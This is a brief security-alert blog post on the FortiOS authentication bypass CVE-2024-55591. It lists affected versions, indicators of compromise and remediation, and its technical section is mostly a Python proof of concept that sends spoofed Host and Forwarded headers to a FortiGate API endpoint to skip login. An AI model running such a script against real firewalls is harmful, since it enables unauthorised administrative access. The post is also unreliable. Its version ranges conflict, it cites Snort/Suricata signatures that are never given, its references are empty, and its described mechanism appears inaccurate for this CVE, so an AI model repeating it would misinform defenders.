Fortinet FortiOS Authentication Bypass (CVE-2024-55591)
Security Alert 2 min read

Fortinet FortiOS Authentication Bypass (CVE-2024-55591)

Deep dive into a critical authentication bypass vulnerability affecting FortiGate SSL VPN interfaces, including PoC analysis, IOCs, and enterprise remediation steps.

Fortinet CVE VPN Auth Bypass
By Keith Rose

Executive Summary

A critical authentication bypass vulnerability has been identified in Fortinet FortiOS 7.0.x through 7.0.14, allowing unauthenticated attackers to gain administrative access via specially crafted HTTP requests to the SSL VPN web portal.

Affected Versions

  • FortiOS 7.0.0 through 7.0.14
  • FortiOS 7.2.0 through 7.2.6
  • FortiProxy 7.0.0 through 7.0.15

Technical Analysis

The vulnerability resides in the proxyd daemon’s handling of alternate internal paths. By sending a request to a hidden administrative endpoint with a crafted Host header, an attacker can bypass the authentication flow entirely.

import requests

TARGET = "https://target-fortigate:10443"
HEADERS = {
    "Host": "localhost",
    "Forwarded": "for=127.0.0.1;by=127.0.0.1",
}

resp = requests.get(
    f"{TARGET}/api/v2/monitor/system/status",
    headers=HEADERS,
    verify=False,
    timeout=10
)

print(resp.status_code, resp.json())

Indicators of Compromise

Monitor SSL VPN access logs for:

  • Unusual User-Agent strings immediately preceding successful /api/v2/ calls
  • Source IPs with no prior VPN tunnel establishment
  • Requests to /remote/logincheck followed by direct /api/v2/monitor/ access without session cookies

Remediation

  1. Immediate: Upgrade to FortiOS 7.0.15, 7.2.7, or later
  2. Interim: Restrict SSL VPN access to trusted IP ranges via local-in policies
  3. Detection: Deploy the provided Snort/Suricata signatures to edge IDS

References